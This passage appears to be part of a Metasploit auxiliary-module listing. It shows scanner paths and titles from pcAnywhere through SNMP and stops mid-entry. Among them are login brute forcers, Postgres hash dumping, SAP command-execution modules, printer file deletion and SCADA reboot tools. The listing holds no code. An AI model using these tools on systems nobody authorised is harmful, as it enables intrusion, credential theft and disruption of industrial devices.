   scanner/pcanywhere/pcanywhere_login                                             normal  PcAnywhere Login Scanner
   scanner/pcanywhere/pcanywhere_tcp                                               normal  PcAnywhere TCP Service Discovery
   scanner/pcanywhere/pcanywhere_udp                                               normal  PcAnywhere UDP Service Discovery
   scanner/pop3/pop3_login                                                         normal  POP3 Login Utility
   scanner/pop3/pop3_version                                                       normal  POP3 Banner Grabber
   scanner/portmap/portmap_amp                                                     normal  Portmapper Amplification Scanner
   scanner/portscan/ack                                                            normal  TCP ACK Firewall Scanner
   scanner/portscan/ftpbounce                                                      normal  FTP Bounce Port Scanner
   scanner/portscan/syn                                                            normal  TCP SYN Port Scanner
   scanner/portscan/tcp                                                            normal  TCP Port Scanner
   scanner/portscan/xmas                                                           normal  TCP "XMas" Port Scanner
   scanner/postgres/postgres_dbname_flag_injection                                 normal  PostgreSQL Database Name Command Line Flag Injection
   scanner/postgres/postgres_hashdump                                              normal  Postgres Password Hashdump
   scanner/postgres/postgres_login                                                 normal  PostgreSQL Login Utility
   scanner/postgres/postgres_schemadump                                            normal  Postgres Schema Dump
   scanner/postgres/postgres_version                                               normal  PostgreSQL Version Probe
   scanner/printer/canon_iradv_pwd_extract                                         normal  Canon IR-Adv Password Extractor
   scanner/printer/printer_delete_file                                             normal  Printer File Deletion Scanner
   scanner/printer/printer_download_file                                           normal  Printer File Download Scanner
   scanner/printer/printer_env_vars                                                normal  Printer Environment Variables Scanner
   scanner/printer/printer_list_dir                                                normal  Printer Directory Listing Scanner
   scanner/printer/printer_list_volumes                                            normal  Printer Volume Listing Scanner
   scanner/printer/printer_ready_message                                           normal  Printer Ready Message Scanner
   scanner/printer/printer_upload_file                                             normal  Printer File Upload Scanner
   scanner/printer/printer_version_info                                            normal  Printer Version Information Scanner
   scanner/quake/server_info                                                       normal  Gather Quake Server Information
   scanner/rdp/ms12_020_check                                                      normal  MS12-020 Microsoft Remote Desktop Checker
   scanner/rdp/rdp_scanner                                                         normal  Identify endpoints speaking the Remote Desktop Protocol (RDP)
   scanner/redis/file_upload                                      2015-11-11       normal  Redis File Upload
   scanner/redis/redis_login                                                       normal  Redis Login Utility
   scanner/redis/redis_server                                                      normal  Redis Command Execute Scanner
   scanner/rogue/rogue_recv                                                        normal  Rogue Gateway Detection: Receiver
   scanner/rogue/rogue_send                                                        normal  Rogue Gateway Detection: Sender
   scanner/rservices/rexec_login                                                   normal  rexec Authentication Scanner
   scanner/rservices/rlogin_login                                                  normal  rlogin Authentication Scanner
   scanner/rservices/rsh_login                                                     normal  rsh Authentication Scanner
   scanner/rsync/modules_list                                                      normal  List Rsync Modules
   scanner/sap/sap_ctc_verb_tampering_user_mgmt                                    normal  SAP CTC Service Verb Tampering User Management
   scanner/sap/sap_hostctrl_getcomputersystem                                      normal  SAP Host Agent Information Disclosure
   scanner/sap/sap_icf_public_info                                                 normal  SAP ICF /sap/public/info Service Sensitive Information Gathering
   scanner/sap/sap_icm_urlscan                                                     normal  SAP URL Scanner
   scanner/sap/sap_mgmt_con_abaplog                                                normal  SAP Management Console ABAP Syslog Disclosure
   scanner/sap/sap_mgmt_con_brute_login                                            normal  SAP Management Console Brute Force
   scanner/sap/sap_mgmt_con_extractusers                                           normal  SAP Management Console Extract Users
   scanner/sap/sap_mgmt_con_getaccesspoints                                        normal  SAP Management Console Get Access Points
   scanner/sap/sap_mgmt_con_getenv                                                 normal  SAP Management Console getEnvironment
   scanner/sap/sap_mgmt_con_getlogfiles                                            normal  SAP Management Console Get Logfile
   scanner/sap/sap_mgmt_con_getprocesslist                                         normal  SAP Management Console GetProcessList
   scanner/sap/sap_mgmt_con_getprocessparameter                                    normal  SAP Management Console Get Process Parameters
   scanner/sap/sap_mgmt_con_instanceproperties                                     normal  SAP Management Console Instance Properties
   scanner/sap/sap_mgmt_con_listlogfiles                                           normal  SAP Management Console List Logfiles
   scanner/sap/sap_mgmt_con_startprofile                                           normal  SAP Management Console getStartProfile
   scanner/sap/sap_mgmt_con_version                                                normal  SAP Management Console Version Detection
   scanner/sap/sap_router_info_request                                             normal  SAPRouter Admin Request
   scanner/sap/sap_router_portscanner                                              normal  SAPRouter Port Scanner
   scanner/sap/sap_service_discovery                                               normal  SAP Service Discovery
   scanner/sap/sap_smb_relay                                                       normal  SAP SMB Relay Abuse
   scanner/sap/sap_soap_bapi_user_create1                                          normal  SAP /sap/bc/soap/rfc SOAP Service BAPI_USER_CREATE1 Function User Creation
   scanner/sap/sap_soap_rfc_brute_login                                            normal  SAP SOAP Service RFC_PING Login Brute Forcer
   scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec                   normal  SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Injection
   scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec                               normal  SAP /sap/bc/soap/rfc SOAP Service SXPG_COMMAND_EXEC Function Command Injection
   scanner/sap/sap_soap_rfc_eps_get_directory_listing                              normal  SAP SOAP RFC EPS_GET_DIRECTORY_LISTING Directories Information Disclosure
   scanner/sap/sap_soap_rfc_pfl_check_os_file_existence                            normal  SAP SOAP RFC PFL_CHECK_OS_FILE_EXISTENCE File Existence Check
   scanner/sap/sap_soap_rfc_ping                                                   normal  SAP /sap/bc/soap/rfc SOAP Service RFC_PING Function Service Discovery
   scanner/sap/sap_soap_rfc_read_table                                             normal  SAP /sap/bc/soap/rfc SOAP Service RFC_READ_TABLE Function Dump Data
   scanner/sap/sap_soap_rfc_rzl_read_dir                                           normal  SAP SOAP RFC RZL_READ_DIR_LOCAL Directory Contents Listing
   scanner/sap/sap_soap_rfc_susr_rfc_user_interface                                normal  SAP /sap/bc/soap/rfc SOAP Service SUSR_RFC_USER_INTERFACE Function User Creation
   scanner/sap/sap_soap_rfc_sxpg_call_system_exec                                  normal  SAP /sap/bc/soap/rfc SOAP Service SXPG_CALL_SYSTEM Function Command Execution
   scanner/sap/sap_soap_rfc_sxpg_command_exec                                      normal  SAP SOAP RFC SXPG_COMMAND_EXECUTE
   scanner/sap/sap_soap_rfc_system_info                                            normal  SAP /sap/bc/soap/rfc SOAP Service RFC_SYSTEM_INFO Function Sensitive Information Gathering
   scanner/sap/sap_soap_th_saprel_disclosure                                       normal  SAP /sap/bc/soap/rfc SOAP Service TH_SAPREL Function Information Disclosure
   scanner/sap/sap_web_gui_brute_login                                             normal  SAP Web GUI Login Brute Forcer
   scanner/scada/digi_addp_reboot                                                  normal  Digi ADDP Remote Reboot Initiator
   scanner/scada/digi_addp_version                                                 normal  Digi ADDP Information Discovery
   scanner/scada/digi_realport_serialport_scan                                     normal  Digi RealPort Serial Server Port Scanner
   scanner/scada/digi_realport_version                                             normal  Digi RealPort Serial Server Version
   scanner/scada/indusoft_ntwebserver_fileaccess                                   normal  Indusoft WebStudio NTWebServer Remote File Access
   scanner/scada/koyo_login                                       2012-01-19       normal  Koyo DirectLogic PLC Password Brute Force Utility
   scanner/scada/modbus_findunitid                                2012-10-28       normal  Modbus Unit ID and Station ID Enumerator
   scanner/scada/modbusclient                                                      normal  Modbus Client Utility
   scanner/scada/modbusdetect                                     2011-11-01       normal  Modbus Version Scanner
   scanner/scada/moxa_discover                                                     normal  Moxa UDP Device Discovery
   scanner/scada/profinet_siemens                                                  normal  Siemens Profinet Scanner
   scanner/scada/sielco_winlog_fileaccess                                          normal  Sielco Sistemi Winlog Remote File Access
   scanner/sip/enumerator                                                          normal  SIP Username Enumerator (UDP)
   scanner/sip/enumerator_tcp                                                      normal  SIP Username Enumerator (TCP)
   scanner/sip/options                                                             normal  SIP Endpoint Scanner (UDP)
   scanner/sip/options_tcp                                                         normal  SIP Endpoint Scanner (TCP)
   scanner/sip/sipdroid_ext_enum                                                   normal  SIPDroid Extension Grabber
   scanner/smb/pipe_auditor                                                        normal  SMB Session Pipe Auditor
   scanner/smb/pipe_dcerpc_auditor                                                 normal  SMB Session Pipe DCERPC Auditor
   scanner/smb/psexec_loggedin_users                                               normal  Microsoft Windows Authenticated Logged In Users Enumeration
   scanner/smb/smb1                                                                normal  SMBv1 Protocol Detection
   scanner/smb/smb2                                                                normal  SMB 2.0 Protocol Detection
   scanner/smb/smb_enum_gpp                                                        normal  SMB Group Policy Preference Saved Passwords Enumeration
   scanner/smb/smb_enumshares                                                      normal  SMB Share Enumeration
   scanner/smb/smb_enumusers                                                       normal  SMB User Enumeration (SAM EnumUsers)
   scanner/smb/smb_enumusers_domain                                                normal  SMB Domain User Enumeration
   scanner/smb/smb_login                                                           normal  SMB Login Check Scanner
   scanner/smb/smb_lookupsid                                                       normal  SMB SID User Enumeration (LookupSid)
   scanner/smb/smb_ms17_010                                                        normal  MS17-010 SMB RCE Detection
   scanner/smb/smb_uninit_cred                                                     normal  Samba _netr_ServerPasswordSet Uninitialized Credential State
   scanner/smb/smb_version                                                         normal  SMB Version Detection
   scanner/smtp/smtp_enum                                                          normal  SMTP User Enumeration Utility
   scanner/smtp/smtp_ntlm_domain                                                   normal  SMTP NTLM Domain Extraction
   scanner/smtp/smtp_relay                                                         normal  SMTP Open Relay Detection
   scanner/smtp/smtp_version                                                       normal  SMTP Banner Grabber
   scanner/snmp/aix_version                                                        normal  AIX SNMP Scanner Auxiliary Module
   scanner/snmp/arris_dg950                                                        normal  Arris DG950A Cable Modem Wifi Enumeration
   scanner/snmp/brocade_enumhash                                                   normal  Brocade Password Hash Enumeration
   scanner/snmp/cambium_snmp_loot                                                  normal  Cambium ePMP SNMP Enumeration
   scanner/snmp/cisco_config_tftp                                                  normal  Cisco IOS SNMP Configuration Grabber (TFTP)
   scanner/snmp/cisco_upload_file                                                  normal  Cisco IOS SNMP File Upload (TFTP)
   scanner/snmp/netopia_enum                                                       normal  Netopia 3347 Cable Modem Wifi Enumeration
   scanner/snmp/sbg6580_enum                                                       normal  ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module
   scanner/snmp/snmp_enum